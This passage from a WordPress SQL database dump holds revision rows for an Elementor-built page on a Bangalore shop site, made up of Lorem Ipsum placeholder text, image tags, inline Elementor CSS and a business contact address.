was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-testimonial-wrapper{overflow:hidden;text-align:center}.elementor-testimonial-wrapper .elementor-testimonial-content{font-size:1.3em;margin-bottom:20px}.elementor-testimonial-wrapper .elementor-testimonial-name{line-height:1.5;display:block}.elementor-testimonial-wrapper .elementor-testimonial-job{font-size:.85em;display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta{width:100%;line-height:1}.elementor-testimonial-wrapper .elementor-testimonial-meta-inner{display:inline-block}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image{display:table-cell;vertical-align:middle}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image img{width:60px;height:60px;border-radius:50%;-o-object-fit:cover;object-fit:cover;max-width:none}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-image{padding-right:15px}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-details{text-align:left}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{margin-bottom:20px}</style>		\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-03 10:57:57','2022-10-03 05:27:57','',1373,'https://gopalak.in/?p=1518',0,'revision','',0),(1520,1,'2022-10-03 11:06:48','2022-10-03 05:36:48','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo</p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"612\" height=\"408\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg 612w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-300x200.jpg 300w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-50x33.jpg 50w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-48x32.jpg 48w\" sizes=\"(max-width: 612px) 100vw, 612px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-accordion{text-align:left}.elementor-accordion .elementor-accordion-item{border:1px solid #d4d4d4}.elementor-accordion .elementor-accordion-item+.elementor-accordion-item{border-top:none}.elementor-accordion .elementor-tab-title{margin:0;padding:15px 20px;font-weight:700;line-height:1;cursor:pointer;outline:none}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{display:inline-block;width:1.5em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon svg{width:1em;height:1em}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-right{float:right;text-align:right}.elementor-accordion .elementor-tab-title .elementor-accordion-icon.elementor-accordion-icon-left{float:left;text-align:left}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-closed{display:block}.elementor-accordion .elementor-tab-title .elementor-accordion-icon .elementor-accordion-icon-opened,.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-closed{display:none}.elementor-accordion .elementor-tab-title.elementor-active .elementor-accordion-icon-opened{display:block}.elementor-accordion .elementor-tab-content{display:none;padding:15px 20px;border-top:1px solid #d4d4d4}@media (max-width:767px){.elementor-accordion .elementor-tab-title{padding:12px 15px}.elementor-accordion .elementor-tab-title .elementor-accordion-icon{width:1.2em}.elementor-accordion .elementor-tab-content{padding:7px 15px}}.e-container>.elementor-widget-accordion{width:var(--container-widget-width,100%)}</style>		\n												<a href=\"\">Accordion #1</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion #2</a>\n					Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n												<a href=\"\">Accordion Title</a>\n					Accordion Content\n			<h2>Add Your Heading Text Here</h2>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-divider{--divider-border-style:none;--divider-border-width:1px;--divider-color:#2c2c2c;--divider-icon-size:20px;--divider-element-spacing:10px;--divider-pattern-height:24px;--divider-pattern-size:20px;--divider-pattern-url:none;--divider-pattern-repeat:repeat-x}.elementor-widget-divider .elementor-divider{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-divider .elementor-divider__text{font-size:15px;line-height:1;max-width:95%}.elementor-widget-divider .elementor-divider__element{margin:0 var(--divider-element-spacing);-ms-flex-negative:0;flex-shrink:0}.elementor-widget-divider .elementor-icon{font-size:var(--divider-icon-size)}.elementor-widget-divider .elementor-divider-separator{display:-webkit-box;display:-ms-flexbox;display:flex;margin:0;direction:ltr}.elementor-widget-divider--view-line_icon .elementor-divider-separator,.elementor-widget-divider--view-line_text .elementor-divider-separator{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-divider--view-line_icon .elementor-divider-separator:after,.elementor-widget-divider--view-line_icon .elementor-divider-separator:before,.elementor-widget-divider--view-line_text .elementor-divider-separator:after,.elementor-widget-divider--view-line_text .elementor-divider-separator:before{display:block;content:\"\";border-bottom:0;-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--element-align-left .elementor-divider .elementor-divider-separator>.elementor-divider__svg:first-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-left .elementor-divider-separator:before{content:none}.elementor-widget-divider--element-align-left .elementor-divider__element{margin-left:0}.elementor-widget-divider--element-align-right .elementor-divider .elementor-divider-separator>.elementor-divider__svg:last-of-type{-webkit-box-flex:0;-ms-flex-positive:0;flex-grow:0;-ms-flex-negative:100;flex-shrink:100}.elementor-widget-divider--element-align-right .elementor-divider-separator:after{content:none}.elementor-widget-divider--element-align-right .elementor-divider__element{margin-right:0}.elementor-widget-divider:not(.elementor-widget-divider--view-line_text):not(.elementor-widget-divider--view-line_icon) .elementor-divider-separator{border-top:var(--divider-border-width) var(--divider-border-style) var(--divider-color)}.elementor-widget-divider--separator-type-pattern{--divider-border-style:none}.elementor-widget-divider--separator-type-pattern.elementor-widget-divider--view-line .elementor-divider-separator,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:after,.elementor-widget-divider--separator-type-pattern:not(.elementor-widget-divider--view-line) .elementor-divider-separator:before,.elementor-widget-divider--separator-type-pattern:not([class*=elementor-widget-divider--view]) .elementor-divider-separator{width:100%;min-height:var(--divider-pattern-height);-webkit-mask-size:var(--divider-pattern-size) 100%;mask-size:var(--divider-pattern-size) 100%;-webkit-mask-repeat:var(--divider-pattern-repeat);mask-repeat:var(--divider-pattern-repeat);background-color:var(--divider-color);-webkit-mask-image:var(--divider-pattern-url);mask-image:var(--divider-pattern-url)}.elementor-widget-divider--no-spacing{--divider-pattern-size:auto}.elementor-widget-divider--bg-round{--divider-pattern-repeat:round}.rtl .elementor-widget-divider .elementor-divider__text{direction:rtl}.e-container>.elementor-widget-divider{width:var(--container-widget-width,100%);--flex-grow:var(--container-widget-flex-grow,0)}</style>		\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1024x640.webp 1024w, https://gopalak.in/wp-content/uploads/2022/09/279356-300x188.webp 300w, https://gopalak.in/wp-content/uploads/2022/09/279356-768x480.webp 768w, https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp 1536w, https://gopalak.in/wp-content/uploads/2022/09/279356-50x31.webp 50w, https://gopalak.in/wp-content/uploads/2022/09/279356-48x30.webp 48w, https://gopalak.in/wp-content/uploads/2022/09/279356.webp 1920w\" sizes=\"(max-width: 640px) 100vw, 640px\" />															\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-testimonial-wrapper{overflow:hidden;text-align:center}.elementor-testimonial-wrapper .elementor-testimonial-content{font-size:1.3em;margin-bottom:20px}.elementor-testimonial-wrapper .elementor-testimonial-name{line-height:1.5;display:block}.elementor-testimonial-wrapper .elementor-testimonial-job{font-size:.85em;display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta{width:100%;line-height:1}.elementor-testimonial-wrapper .elementor-testimonial-meta-inner{display:inline-block}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image{display:table-cell;vertical-align:middle}.elementor-testimonial-wrapper .elementor-testimonial-meta .elementor-testimonial-image img{width:60px;height:60px;border-radius:50%;-o-object-fit:cover;object-fit:cover;max-width:none}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-image{padding-right:15px}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-aside .elementor-testimonial-details{text-align:left}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-details,.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{display:block}.elementor-testimonial-wrapper .elementor-testimonial-meta.elementor-testimonial-image-position-top .elementor-testimonial-image{margin-bottom:20px}</style>		\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n							Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\n							<img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />						\n														John Doe\n																						Designer\n			<h1>Add Your Heading Text Here</h1>		\n		<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</strong></h4>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-03 11:06:48','2022-10-03 05:36:48','',1373,'https://gopalak.in/?p=1520',0,'revision','',0),(1521,1,'2022-10-03 11:06:48','2022-10-03 05:36:48','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Add Your Heading Text Here</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p>Lorem 